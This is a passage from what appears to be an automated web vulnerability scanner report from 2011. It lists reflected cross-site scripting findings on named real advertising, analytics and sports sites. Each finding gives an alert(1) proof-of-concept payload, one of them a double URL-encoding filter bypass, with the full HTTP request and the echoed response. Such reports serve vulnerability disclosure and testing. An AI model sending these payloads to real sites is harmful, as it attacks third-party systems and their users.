Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 222
Date: Mon, 03 Oct 2011 00:35:57 GMT
Server: Test & Target

mboxFactories.get('default').get('trip_landing_vacation_pkgs4e803<script>alert(1)</script>d023063abdc',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");

4.78. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9f6fa<img%20src%3da%20onerror%3dalert(1)>1c6c15d13c9 was submitted in the mbox parameter. This input was echoed as 9f6fa<img src=a onerror=alert(1)>1c6c15d13c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/orbitzaway/sc/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099308-330823&mboxCount=3&mbox=SiteCatalyst%3A%20event9f6fa<img%20src%3da%20onerror%3dalert(1)>1c6c15d13c9&mboxId=0&mboxTime=1317584104195&visitorNamespace=orbitzaway&pageName=Flights&currencyCode=USD&channel=Compare_Rates&server=trip.com&events=event2&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=0&browserHeight=0&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=javascript%3A%2Ctrip.com&linkTrackVars=None&linkTrackEvents=None&prop8=Data%20Not%20Available&eVar8=Data%20Not%20Available&prop9=Data%20Not%20Available&eVar9=Data%20Not%20Available&prop10=Data%20Not%20Available&eVar10=Data%20Not%20Available&eVar11=Flights&eVar12=Compare_Rates&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 264
Date: Mon, 03 Oct 2011 00:37:08 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");mboxFactories.get('default').get('SiteCatalyst: event9f6fa<img src=a onerror=alert(1)>1c6c15d13c9', 0).setOffer(new mboxOfferDefault()).loaded();}

4.79. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard [mboxId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload e05e0<script>alert(1)</script>93f9fb94bab was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/orbitzaway/sc/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099308-330823&mboxCount=3&mbox=SiteCatalyst%3A%20event&mboxId=0e05e0<script>alert(1)</script>93f9fb94bab&mboxTime=1317584104195&visitorNamespace=orbitzaway&pageName=Flights&currencyCode=USD&channel=Compare_Rates&server=trip.com&events=event2&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=0&browserHeight=0&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=javascript%3A%2Ctrip.com&linkTrackVars=None&linkTrackEvents=None&prop8=Data%20Not%20Available&eVar8=Data%20Not%20Available&prop9=Data%20Not%20Available&eVar9=Data%20Not%20Available&prop10=Data%20Not%20Available&eVar10=Data%20Not%20Available&eVar11=Flights&eVar12=Compare_Rates&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 261
Date: Mon, 03 Oct 2011 00:37:14 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");mboxFactories.get('default').get('SiteCatalyst: event', 0e05e0<script>alert(1)</script>93f9fb94bab).setOffer(new mboxOfferDefault()).loaded();}

4.80. http://otter.topsy.com/stats.js [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://otter.topsy.com
Path:   /stats.js

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 4e09d%253cscript%253ealert%25281%2529%253c%252fscript%253e2c4a6fbea89 was submitted in the url parameter. This input was echoed as 4e09d<script>alert(1)</script>2c4a6fbea89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /stats.js?url=http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/4e09d%253cscript%253ealert%25281%2529%253c%252fscript%253e2c4a6fbea89&callback=jQuery1505501451776362956_1317600055917&_=1317600061932 HTTP/1.1
Host: otter.topsy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5
Content-Type: application/json; charset=utf-8
Expires: Mon, 03 Oct 2011 00:02:23 GMT
Last-Modified: Mon, 03 Oct 2011 00:02:18 GMT
Server: lighttpd/1.4.26
Content-Length: 648
Date: Mon, 03 Oct 2011 00:02:18 GMT
X-Varnish: 1815814625
Age: 0
Via: 1.1 varnish
X-Served-By: ps198
X-Cache: MISS
X-RateLimit-Limit: 3000
X-RateLimit-Remaining: 2980
X-RateLimit-Reset: 1317625200
Connection: close

{"request":{"parameters":{"url":"http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/4e09d<script>alert(1)</script>2c4a6fbea89"},"response_type":"json","resource":"stats","url":"http://otter.topsy.com/stats.json?url=http%3A%2F%2Fhublotnation.com%2F2011%2F09%2F23%2Fhublot-watchesa-look-at-the-king-power-dwayne-wade%2F4e09d%3Cs
...[SNIP]...

4.81. https://secure.mlb.com/style/nav_2011.jsp [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /style/nav_2011.jsp

Issue detail

The value of the section request parameter is copied into the HTML document as plain text between tags. The payload 7050a<script>alert(1)</script>7aa54aad239 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /style/nav_2011.jsp?c_id=%0Adocument.title=1317599336102051;&section=schedule7050a<script>alert(1)</script>7aa54aad239 HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:49:09 GMT
Expires: Mon, 03 Oct 2011 01:49:09 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 17041


/* global overides */
#masthead body, #masthead div, #masthead dl, #masthead dt, #masthead dd, #masthead ul, #masthead ol, #masthead
...[SNIP]...
bottom, color-stop(0%,), color-stop(57%,)); /* webkit */filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='', endColorstr='',GradientType=0 ); /* ie */}

#value-menu li#header_schedule7050a<script>alert(1)</script>7aa54aad239 a, .dd_navigation li.first:hover, .dd_navigation li.first a:hover, .dd_navigation li.first.vmHover a, .dd_navigation li.first:hover a, .dd_navigation li.first a:focus, .dd_navigation a:active {color:;
...[SNIP]...

4.82. http://servedby.flashtalking.com/imp/1/16628 [183799;201;js;BarclaysPremierLeague;RONMPU/?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The value of the 183799;201;js;BarclaysPremierLeague;RONMPU/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21b49"-alert(1)-"89d3efd3f60 was submitted in the 183799;201;js;BarclaysPremierLeague;RONMPU/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=21b49"-alert(1)-"89d3efd3f60&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=1370EED173DB5A|f20004352=(s:2-t:13702355)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:55:55 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 02 Oct 2011 23:55:55 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 587


var ftGUID_183799="1370EED173DB5A";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=21b49"-alert(1)-"89d3efd3f60&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src=
...[SNIP]...

4.83. http://servedby.flashtalking.com/imp/1/16628 [cachebuster parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63a0b"-alert(1)-"b1662c828f2 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.048300936863a0b"-alert(1)-"b1662c828f2 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:27 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1370EED173DB5A|f20004352=(s:2-t:13702355)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:56:27 GMT
Cache-Control: no-cache, no-store
Content-Length: 587
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 sjc005204 (MII-APC/2.1)


var ftGUID_183799="1370EED173DB5A";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.048300936863a0b"-alert(1)-"b1662c828f2";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/18/183799/231524/js/j
...[SNIP]...

4.84. http://servedby.flashtalking.com/imp/1/16628 [ftadz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0aa0"-alert(1)-"1be41f544a2 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=a0aa0"-alert(1)-"1be41f544a2&ftscw=&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:15 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1370EED173DB5A|f20004352=(s:2-t:13702355)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:56:15 GMT
Cache-Control: no-cache, no-store
Content-Length: 587
pragma: no-cache
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 sjc005204 (MII-APC/2.1)


var ftGUID_183799="1370EED173DB5A";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=a0aa0"-alert(1)-"1be41f544a2&ftscw=&cachebuster=742186.0483009368";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src="http://cdn.flash
...[SNIP]...

4.85. http://servedby.flashtalking.com/imp/1/16628 [ftscw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d94e"-alert(1)-"28a61fe6ab9 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=3d94e"-alert(1)-"28a61fe6ab9&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:21 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1370EED173DB5A|f20004352=(s:2-t:13702355)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:56:21 GMT
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Type: text/javascript
Content-Length: 587
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 sjc005204 (MII-APC/2.1)


var ftGUID_183799="1370EED173DB5A";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=3d94e"-alert(1)-"28a61fe6ab9&cachebuster=742186.0483009368";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking
...[SNIP]...

4.86. http://servedby.flashtalking.com/imp/1/16628 [ftx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 840ca"-alert(1)-"66aa2a01380 was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=840ca"-alert(1)-"66aa2a01380&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:02 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1370EED173DB5A|f20004352=(s:2-t:13702355)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:56:02 GMT
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Type: text/javascript
Content-Length: 587
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 sjc005202 (MII-APC/2.1)


var ftGUID_183799="1370EED173DB5A";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=840ca"-alert(1)-"66aa2a01380&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src="http
...[SNIP]...

4.87. http://servedby.flashtalking.com/imp/1/16628 [fty parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c09f"-alert(1)-"66ba1909e6e was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=4c09f"-alert(1)-"66ba1909e6e&ftadz=&ftscw=&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:08 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1370EED173DB5A|f20004352=(s:2-t:13702355)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:56:08 GMT
Cache-Control: no-cache, no-store
Content-Length: 587
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 sjc005203 (MII-APC/2.1)


var ftGUID_183799="1370EED173DB5A";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=4c09f"-alert(1)-"66ba1909e6e&ftadz=&ftscw=&cachebuster=742186.0483009368";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src="http://cd
...[SNIP]...

4.88. http://servedby.flashtalking.com/imp/1/16628 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3805"-alert(1)-"6ebdb2ef636 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368&b3805"-alert(1)-"6ebdb2ef636=1 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:37 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=13704C17CA7D33|f20004352=(s:2-t:13702356)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:56:37 GMT
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Type: text/javascript
Content-Length: 590
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 sjc005202 (MII-APC/2.1)


